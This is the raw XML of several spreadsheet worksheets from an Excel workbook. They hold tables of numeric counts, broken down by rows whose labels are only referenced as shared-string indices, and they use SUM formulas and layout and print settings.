        <f t="shared" si="5"/>
        <v>520</v>
      </c>
      <c r="E13" s="113">
        <f t="shared" si="1"/>
        <v>919</v>
      </c>
      <c r="F13" s="23">
        <v>727</v>
      </c>
      <c r="G13" s="23">
        <v>192</v>
      </c>
      <c r="H13" s="113">
        <f t="shared" si="6"/>
        <v>744</v>
      </c>
      <c r="I13" s="23">
        <v>518</v>
      </c>
      <c r="J13" s="23">
        <v>226</v>
      </c>
      <c r="K13" s="113">
        <f t="shared" si="7"/>
        <v>696</v>
      </c>
      <c r="L13" s="23">
        <v>594</v>
      </c>
      <c r="M13" s="23">
        <v>102</v>
      </c>
      <c r="N13" s="23">
        <v>2309</v>
      </c>
      <c r="O13" s="23">
        <v>50</v>
      </c>
      <c r="P13" s="23">
        <v>0</v>
      </c>
      <c r="Q13" s="24">
        <f t="shared" si="2"/>
        <v>2359</v>
      </c>
    </row>
    <row r="14" spans="1:17" ht="18" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B14" s="114">
        <f t="shared" si="3"/>
        <v>691</v>
      </c>
      <c r="C14" s="114">
        <f t="shared" si="4"/>
        <v>504</v>
      </c>
      <c r="D14" s="114">
        <f t="shared" si="5"/>
        <v>187</v>
      </c>
      <c r="E14" s="113">
        <f t="shared" si="1"/>
        <v>453</v>
      </c>
      <c r="F14" s="23">
        <v>354</v>
      </c>
      <c r="G14" s="23">
        <v>99</v>
      </c>
      <c r="H14" s="113">
        <v>238</v>
      </c>
      <c r="I14" s="23">
        <v>150</v>
      </c>
      <c r="J14" s="23">
        <v>88</v>
      </c>
      <c r="K14" s="113">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="L14" s="23"/>
      <c r="M14" s="23"/>
      <c r="N14" s="23">
        <v>688</v>
      </c>
      <c r="O14" s="23">
        <v>3</v>
      </c>
      <c r="P14" s="23"/>
      <c r="Q14" s="24">
        <f t="shared" si="2"/>
        <v>691</v>
      </c>
    </row>
    <row r="15" spans="1:17" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B15" s="114">
        <f t="shared" si="3"/>
        <v>3142</v>
      </c>
      <c r="C15" s="114">
        <f t="shared" si="4"/>
        <v>1728</v>
      </c>
      <c r="D15" s="114">
        <f t="shared" si="5"/>
        <v>1414</v>
      </c>
      <c r="E15" s="113">
        <f t="shared" si="1"/>
        <v>409</v>
      </c>
      <c r="F15" s="23">
        <v>220</v>
      </c>
      <c r="G15" s="23">
        <v>189</v>
      </c>
      <c r="H15" s="113">
        <f>SUM(I15,J15)</f>
        <v>1194</v>
      </c>
      <c r="I15" s="23">
        <v>534</v>
      </c>
      <c r="J15" s="23">
        <v>660</v>
      </c>
      <c r="K15" s="113">
        <f t="shared" si="7"/>
        <v>1539</v>
      </c>
      <c r="L15" s="23">
        <v>974</v>
      </c>
      <c r="M15" s="23">
        <v>565</v>
      </c>
      <c r="N15" s="23">
        <v>3125</v>
      </c>
      <c r="O15" s="23">
        <v>17</v>
      </c>
      <c r="P15" s="23">
        <v>0</v>
      </c>
      <c r="Q15" s="24">
        <f t="shared" si="2"/>
        <v>3142</v>
      </c>
    </row>
    <row r="16" spans="1:17" ht="18" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B16" s="114">
        <f t="shared" si="3"/>
        <v>1942</v>
      </c>
      <c r="C16" s="114">
        <f t="shared" si="4"/>
        <v>1748</v>
      </c>
      <c r="D16" s="114">
        <f t="shared" si="5"/>
        <v>194</v>
      </c>
      <c r="E16" s="113">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="F16" s="23">
        <v>0</v>
      </c>
      <c r="G16" s="23">
        <v>0</v>
      </c>
      <c r="H16" s="113">
        <v>100</v>
      </c>
      <c r="I16" s="23">
        <v>64</v>
      </c>
      <c r="J16" s="23">
        <v>36</v>
      </c>
      <c r="K16" s="113">
        <v>1842</v>
      </c>
      <c r="L16" s="23">
        <v>1684</v>
      </c>
      <c r="M16" s="23">
        <v>158</v>
      </c>
      <c r="N16" s="23">
        <v>1942</v>
      </c>
      <c r="O16" s="23">
        <v>0</v>
      </c>
      <c r="P16" s="23">
        <v>0</v>
      </c>
      <c r="Q16" s="24">
        <f t="shared" si="2"/>
        <v>1942</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="7">
    <mergeCell ref="A1:F1"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="N3:P3"/>
    <mergeCell ref="B3:D3"/>
    <mergeCell ref="E3:G3"/>
    <mergeCell ref="H3:J3"/>
    <mergeCell ref="K3:M3"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.35433070866141736" right="0.03937007874015748" top="0.5905511811023623" bottom="0.5118110236220472" header="0.5118110236220472" footer="0.5118110236220472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30" customWidth="1"/>
    <col min="2" max="2" width="1.12109375" style="30" customWidth="1"/>
    <col min="3" max="3" width="28.125" style="30" customWidth="1"/>
    <col min="4" max="16384" width="8.00390625" style="30" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="12.75">
      <c r="A1" s="29" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="2" ht="13.5" thickBot="1">
      <c r="A2" s="29" t="s">
        <v>316</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="13.5" thickBot="1">
      <c r="A3" s="31" t="s">
        <v>275</v>
      </c>
      <c r="C3" s="32" t="s">
        <v>276</v>
      </c>
    </row>
    <row r="4" ht="12.75">
      <c r="A4" s="31">
        <v>3</v>
      </c>
    </row>
    <row r="6" ht="13.5" thickBot="1"/>
    <row r="7" ht="12.75">
      <c r="A7" s="34" t="s">
        <v>277</v>
      </c>
    </row>
    <row r="8" ht="12.75">
      <c r="A8" s="35" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="9" ht="12.75">
      <c r="A9" s="36" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="10" ht="12.75">
      <c r="A10" s="35" t="s">
        <v>280</v>
      </c>
    </row>
    <row r="11" ht="13.5" thickBot="1">
      <c r="A11" s="37" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="13" ht="13.5" thickBot="1"/>
    <row r="14" ht="13.5" thickBot="1">
      <c r="A14" s="32" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="16" ht="13.5" thickBot="1"/>
    <row r="17" ht="13.5" thickBot="1">
      <c r="C17" s="32" t="s">
        <v>283</v>
      </c>
    </row>
    <row r="20" ht="12.75">
      <c r="A20" s="39" t="s">
        <v>284</v>
      </c>
    </row>
    <row r="26" ht="13.5" thickBot="1">
      <c r="C26" s="41" t="s">
        <v>285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pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A5" sqref="A5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="7.625" style="0" customWidth="1"/>
    <col min="2" max="2" width="10.50390625" style="0" customWidth="1"/>
    <col min="3" max="13" width="8.625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" ht="14.25">
      <c r="A1" s="162" t="s">
        <v>312</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162"/>
      <c r="E1" s="15"/>
      <c r="F1" s="15"/>
      <c r="G1" s="15"/>
      <c r="H1" s="15"/>
      <c r="I1" s="15"/>
      <c r="J1" s="15"/>
      <c r="K1" s="15"/>
      <c r="L1" s="15"/>
      <c r="M1" s="15"/>
    </row>
    <row r="2" spans="1:13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 t="s">
        <v>324</v>
      </c>
      <c r="M2" s="15"/>
    </row>
    <row r="3" spans="1:13" ht="21" customHeight="1">
      <c r="A3" s="50" t="s">
        <v>181</v>
      </c>
      <c r="B3" s="55" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="55" t="s">
        <v>57</v>
      </c>
      <c r="D3" s="55" t="s">
        <v>58</v>
      </c>
      <c r="E3" s="55" t="s">
        <v>49</v>
      </c>
      <c r="F3" s="55" t="s">
        <v>50</v>
      </c>
      <c r="G3" s="55" t="s">
        <v>51</v>
      </c>
      <c r="H3" s="55" t="s">
        <v>52</v>
      </c>
      <c r="I3" s="55" t="s">
        <v>53</v>
      </c>
      <c r="J3" s="55" t="s">
        <v>54</v>
      </c>
      <c r="K3" s="55" t="s">
        <v>55</v>
      </c>
      <c r="L3" s="55" t="s">
        <v>56</v>
      </c>
      <c r="M3" s="55" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="4" spans="1:13" ht="16.5" customHeight="1">
      <c r="A4" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="53">
        <f aca="true" t="shared" si="0" ref="B4:M4">SUM(B5:B15)</f>
        <v>18</v>
      </c>
      <c r="C4" s="53">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H4" s="53">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
      <c r="I4" s="53">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="J4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="M4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:13" ht="16.5" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="82">
        <f>SUM(C5:M5)</f>
        <v>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6.5" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="82">
        <f aca="true" t="shared" si="1" ref="B6:B15">SUM(C6:M6)</f>
        <v>0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6.5" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="82">
        <f t="shared" si="1"/>
        <v>1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1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</row>
    <row r="8" spans="1:13" ht="16.5" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="82">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="C8" s="23"/>
      <c r="D8" s="23"/>
      <c r="E8" s="23"/>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="23">
        <v>2</v>
      </c>
      <c r="I8" s="23">
        <v>2</v>
      </c>
      <c r="J8" s="23"/>
      <c r="K8" s="23"/>
      <c r="L8" s="23"/>
      <c r="M8" s="23"/>
    </row>
    <row r="9" spans="1:13" ht="16.5" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="82">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="C9" s="23"/>
      <c r="D9" s="23"/>
      <c r="E9" s="23"/>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="23">
        <v>2</v>
      </c>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="23"/>
      <c r="L9" s="23"/>
      <c r="M9" s="23"/>
    </row>
    <row r="10" spans="1:13" ht="16.5" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="82">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="C10" s="23"/>
      <c r="D10" s="23"/>
      <c r="E10" s="23"/>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="23">
        <v>3</v>
      </c>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
      <c r="M10" s="23"/>
    </row>
    <row r="11" spans="1:13" ht="16.5" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="82">
        <f t="shared" si="1"/>
        <v>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6.5" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="82">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="C12" s="23">
        <v>2</v>
      </c>
      <c r="D12" s="23">
        <v>1</v>
      </c>
      <c r="E12" s="23">
        <v>0</v>
      </c>
      <c r="F12" s="23">
        <v>0</v>
      </c>
      <c r="G12" s="23">
        <v>0</v>
      </c>
      <c r="H12" s="23">
        <v>1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ht="16.5" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="82">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="C13" s="23"/>
      <c r="D13" s="23"/>
      <c r="E13" s="23"/>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="23">
        <v>1</v>
      </c>
      <c r="I13" s="23"/>
      <c r="J13" s="23"/>
      <c r="K13" s="23"/>
      <c r="L13" s="23"/>
      <c r="M13" s="23"/>
    </row>
    <row r="14" spans="1:13" ht="16.5" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="82">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="C14" s="23"/>
      <c r="D14" s="23"/>
      <c r="E14" s="23"/>
      <c r="F14" s="23"/>
      <c r="G14" s="23"/>
      <c r="H14" s="23">
        <v>2</v>
      </c>
      <c r="I14" s="23">
        <v>1</v>
      </c>
      <c r="J14" s="23"/>
      <c r="K14" s="23"/>
      <c r="L14" s="23"/>
      <c r="M14" s="23"/>
    </row>
    <row r="15" spans="1:13" ht="16.5" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="82">
        <f t="shared" si="1"/>
        <v>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</sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:D1"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567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7.125" style="0" customWidth="1"/>
    <col min="2" max="8" width="9.50390625" style="0" customWidth="1"/>
    <col min="9" max="12" width="8.375" style="0" customWidth="1"/>
    <col min="13" max="13" width="8.75390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" ht="14.25">
      <c r="A1" s="162" t="s">
        <v>311</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162"/>
      <c r="E1" s="15"/>
      <c r="F1" s="15"/>
      <c r="G1" s="15"/>
      <c r="H1" s="15"/>
      <c r="I1" s="15"/>
      <c r="J1" s="15"/>
      <c r="K1" s="15"/>
      <c r="L1" s="15"/>
      <c r="M1" s="15"/>
    </row>
    <row r="2" spans="1:13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 t="s">
        <v>325</v>
      </c>
      <c r="M2" s="15"/>
    </row>
    <row r="3" spans="1:13" ht="21" customHeight="1">
      <c r="A3" s="49" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="49" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="51" t="s">
        <v>57</v>
      </c>
      <c r="D3" s="51" t="s">
        <v>58</v>
      </c>
      <c r="E3" s="51" t="s">
        <v>49</v>
      </c>
      <c r="F3" s="50" t="s">
        <v>50</v>
      </c>
      <c r="G3" s="50" t="s">
        <v>51</v>
      </c>
      <c r="H3" s="50" t="s">
        <v>52</v>
      </c>
      <c r="I3" s="50" t="s">
        <v>53</v>
      </c>
      <c r="J3" s="50" t="s">
        <v>54</v>
      </c>
      <c r="K3" s="50" t="s">
        <v>55</v>
      </c>
      <c r="L3" s="50" t="s">
        <v>56</v>
      </c>
      <c r="M3" s="50" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="4" spans="1:13" ht="16.5" customHeight="1">
      <c r="A4" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="53">
        <f aca="true" t="shared" si="0" ref="B4:M4">SUM(B5:B15)</f>
        <v>1238</v>
      </c>
      <c r="C4" s="53">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H4" s="53">
        <f t="shared" si="0"/>
        <v>884</v>
      </c>
      <c r="I4" s="53">
        <f t="shared" si="0"/>
        <v>339</v>
      </c>
      <c r="J4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="M4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:14" ht="16.5" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="82">
        <f>SUM(C5:M5)</f>
        <v>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136">
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:14" ht="16.5" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="82">
        <f aca="true" t="shared" si="1" ref="B6:B15">SUM(C6:M6)</f>
        <v>0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136">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:14" ht="16.5" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="82">
        <f t="shared" si="1"/>
        <v>85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85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136">
        <v>85</v>
      </c>
    </row>
    <row r="8" spans="1:14" ht="16.5" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="82">
        <f t="shared" si="1"/>
        <v>397</v>
      </c>
      <c r="C8" s="23"/>
      <c r="D8" s="23"/>
      <c r="E8" s="23"/>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="23">
        <v>163</v>
      </c>
      <c r="I8" s="23">
        <v>234</v>
      </c>
      <c r="J8" s="23"/>
      <c r="K8" s="23"/>
      <c r="L8" s="23"/>
      <c r="M8" s="23"/>
      <c r="N8" s="136">
        <v>397</v>
      </c>
    </row>
    <row r="9" spans="1:14" ht="16.5" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="82">
        <f t="shared" si="1"/>
        <v>165</v>
      </c>
      <c r="C9" s="23"/>
      <c r="D9" s="23"/>
      <c r="E9" s="23"/>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="23">
        <v>165</v>
      </c>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="23"/>
      <c r="L9" s="23"/>
      <c r="M9" s="23"/>
      <c r="N9" s="136">
        <v>165</v>
      </c>
    </row>
    <row r="10" spans="1:14" ht="16.5" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="82">
        <f t="shared" si="1"/>
        <v>187</v>
      </c>
      <c r="C10" s="23"/>
      <c r="D10" s="23"/>
      <c r="E10" s="23"/>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="23">
        <v>187</v>
      </c>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
      <c r="M10" s="23"/>
      <c r="N10" s="136">
        <v>187</v>
      </c>
    </row>
    <row r="11" spans="1:14" ht="16.5" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="82">
        <f t="shared" si="1"/>
        <v>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136">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:14" ht="16.5" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="82">
        <f t="shared" si="1"/>
        <v>78</v>
      </c>
      <c r="C12" s="23">
        <v>3</v>
      </c>
      <c r="D12" s="23">
        <v>12</v>
      </c>
      <c r="E12" s="23">
        <v>0</v>
      </c>
      <c r="F12" s="23">
        <v>0</v>
      </c>
      <c r="G12" s="23">
        <v>0</v>
      </c>
      <c r="H12" s="23">
        <v>63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136">
        <v>78</v>
      </c>
    </row>
    <row r="13" spans="1:14" ht="16.5" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="82">
        <f t="shared" si="1"/>
        <v>69</v>
      </c>
      <c r="C13" s="23"/>
      <c r="D13" s="23"/>
      <c r="E13" s="23"/>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="23">
        <v>69</v>
      </c>
      <c r="I13" s="23"/>
      <c r="J13" s="23"/>
      <c r="K13" s="23"/>
      <c r="L13" s="23"/>
      <c r="M13" s="23"/>
      <c r="N13" s="136">
        <v>69</v>
      </c>
    </row>
    <row r="14" spans="1:14" ht="16.5" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="82">
        <f t="shared" si="1"/>
        <v>257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152</v>
      </c>
      <c r="I14" s="23">
        <v>105</v>
      </c>
      <c r="J14" s="23">
        <v>0</v>
      </c>
      <c r="K14" s="23">
        <v>0</v>
      </c>
      <c r="L14" s="23">
        <v>0</v>
      </c>
      <c r="M14" s="23">
        <v>0</v>
      </c>
      <c r="N14" s="136">
        <v>257</v>
      </c>
    </row>
    <row r="15" spans="1:14" ht="16.5" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="82">
        <f t="shared" si="1"/>
        <v>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136">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:D1"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.984251968503937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7.875" style="0" customWidth="1"/>
    <col min="2" max="13" width="8.625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" ht="14.25">
      <c r="A1" s="162" t="s">
        <v>310</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162"/>
      <c r="E1" s="15"/>
      <c r="F1" s="15"/>
      <c r="G1" s="15"/>
      <c r="H1" s="15"/>
      <c r="I1" s="15"/>
      <c r="J1" s="15"/>
      <c r="K1" s="15"/>
      <c r="L1" s="15"/>
      <c r="M1" s="15"/>
    </row>
    <row r="2" spans="1:13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 t="s">
        <v>325</v>
      </c>
      <c r="M2" s="15"/>
    </row>
    <row r="3" spans="1:13" ht="21" customHeight="1">
      <c r="A3" s="168" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="168" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="168"/>
      <c r="D3" s="168"/>
      <c r="E3" s="168" t="s">
        <v>59</v>
      </c>
      <c r="F3" s="168"/>
      <c r="G3" s="168"/>
      <c r="H3" s="168" t="s">
        <v>86</v>
      </c>
      <c r="I3" s="168"/>
      <c r="J3" s="168"/>
      <c r="K3" s="168" t="s">
        <v>87</v>
      </c>
      <c r="L3" s="168"/>
      <c r="M3" s="168"/>
    </row>
    <row r="4" spans="1:13" ht="21" customHeight="1">
      <c r="A4" s="168"/>
      <c r="B4" s="50" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="50" t="s">
        <v>12</v>
      </c>
      <c r="D4" s="50" t="s">
        <v>13</v>
      </c>
      <c r="E4" s="50" t="s">
        <v>10</v>
      </c>
      <c r="F4" s="50" t="s">
        <v>12</v>
      </c>
      <c r="G4" s="50" t="s">
        <v>13</v>
      </c>
      <c r="H4" s="50" t="s">
        <v>10</v>
      </c>
      <c r="I4" s="50" t="s">
        <v>12</v>
      </c>
      <c r="J4" s="50" t="s">
        <v>13</v>
      </c>
      <c r="K4" s="50" t="s">
        <v>10</v>
      </c>
      <c r="L4" s="50" t="s">
        <v>12</v>
      </c>
      <c r="M4" s="50" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5" spans="1:13" ht="15.75" customHeight="1">
      <c r="A5" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="53">
        <f aca="true" t="shared" si="0" ref="B5:M5">SUM(B6:B16)</f>
        <v>1238</v>
      </c>
      <c r="C5" s="53">
        <f t="shared" si="0"/>
        <v>1196</v>
      </c>
      <c r="D5" s="53">
        <f t="shared" si="0"/>
        <v>42</v>
      </c>
      <c r="E5" s="53">
        <f t="shared" si="0"/>
        <v>260</v>
      </c>
      <c r="F5" s="53">
        <f t="shared" si="0"/>
        <v>229</v>
      </c>
      <c r="G5" s="53">
        <f t="shared" si="0"/>
        <v>31</v>
      </c>
      <c r="H5" s="53">
        <f t="shared" si="0"/>
        <v>335</v>
      </c>
      <c r="I5" s="53">
        <f t="shared" si="0"/>
        <v>327</v>
      </c>
      <c r="J5" s="53">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="K5" s="53">
        <f t="shared" si="0"/>
        <v>643</v>
      </c>
      <c r="L5" s="53">
        <f t="shared" si="0"/>
        <v>640</v>
      </c>
      <c r="M5" s="53">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:13" ht="15.75" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="114">
        <f>SUM(C6:D6)</f>
        <v>0</v>
      </c>
      <c r="C6" s="114">
        <f>SUM(F6,I6,L6)</f>
        <v>0</v>
      </c>
      <c r="D6" s="114">
        <f>SUM(G6,J6,M6)</f>
        <v>0</v>
      </c>
      <c r="E6" s="113">
        <f>SUM(F6:G6)</f>
        <v>0</v>
      </c>
      <c r="F6" s="23"/>
      <c r="G6" s="23"/>
      <c r="H6" s="113">
        <f>SUM(I6:J6)</f>
        <v>0</v>
      </c>
      <c r="I6" s="23"/>
      <c r="J6" s="23"/>
      <c r="K6" s="113">
        <f>SUM(L6:M6)</f>
        <v>0</v>
      </c>
      <c r="L6" s="23"/>
      <c r="M6" s="23"/>
    </row>
    <row r="7" spans="1:13" ht="15.75" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="114">
        <f aca="true" t="shared" si="1" ref="B7:B16">SUM(C7:D7)</f>
        <v>0</v>
      </c>
      <c r="C7" s="114">
        <f aca="true" t="shared" si="2" ref="C7:C16">SUM(F7,I7,L7)</f>
        <v>0</v>
      </c>
      <c r="D7" s="114">
        <f aca="true" t="shared" si="3" ref="D7:D16">SUM(G7,J7,M7)</f>
        <v>0</v>
      </c>
      <c r="E7" s="113">
        <f aca="true" t="shared" si="4" ref="E7:E16">SUM(F7:G7)</f>
        <v>0</v>
      </c>
      <c r="F7" s="23"/>
      <c r="G7" s="23"/>
      <c r="H7" s="113">
        <f aca="true" t="shared" si="5" ref="H7:H16">SUM(I7:J7)</f>
        <v>0</v>
      </c>
      <c r="I7" s="23"/>
      <c r="J7" s="23"/>
      <c r="K7" s="113">
        <f aca="true" t="shared" si="6" ref="K7:K16">SUM(L7:M7)</f>
        <v>0</v>
      </c>
      <c r="L7" s="23"/>
      <c r="M7" s="23"/>
    </row>
    <row r="8" spans="1:13" ht="15.75" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="114">
        <f t="shared" si="1"/>
        <v>85</v>
      </c>
      <c r="C8" s="114">
        <f t="shared" si="2"/>
        <v>85</v>
      </c>
      <c r="D8" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E8" s="113">
        <f t="shared" si="4"/>
        <v>16</v>
      </c>
      <c r="F8" s="23">
        <v>16</v>
      </c>
      <c r="G8" s="23">
        <v>0</v>
      </c>
      <c r="H8" s="113">
        <f t="shared" si="5"/>
        <v>17</v>
      </c>
      <c r="I8" s="23">
        <v>17</v>
      </c>
      <c r="J8" s="23">
        <v>0</v>
      </c>
      <c r="K8" s="113">
        <f t="shared" si="6"/>
        <v>52</v>
      </c>
      <c r="L8" s="23">
        <v>52</v>
      </c>
      <c r="M8" s="23">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:13" ht="15.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="114">
        <f t="shared" si="1"/>
        <v>397</v>
      </c>
      <c r="C9" s="114">
        <f t="shared" si="2"/>
        <v>393</v>
      </c>
      <c r="D9" s="114">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E9" s="113">
        <f t="shared" si="4"/>
        <v>48</v>
      </c>
      <c r="F9" s="23">
        <v>44</v>
      </c>
      <c r="G9" s="23">
        <v>4</v>
      </c>
      <c r="H9" s="113">
        <f t="shared" si="5"/>
        <v>57</v>
      </c>
      <c r="I9" s="23">
        <v>57</v>
      </c>
      <c r="J9" s="23"/>
      <c r="K9" s="113">
        <f t="shared" si="6"/>
        <v>292</v>
      </c>
      <c r="L9" s="23">
        <v>292</v>
      </c>
      <c r="M9" s="23"/>
    </row>
    <row r="10" spans="1:13" ht="15.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="114">
        <f t="shared" si="1"/>
        <v>165</v>
      </c>
      <c r="C10" s="114">
        <f t="shared" si="2"/>
        <v>154</v>
      </c>
      <c r="D10" s="114">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
      <c r="E10" s="113">
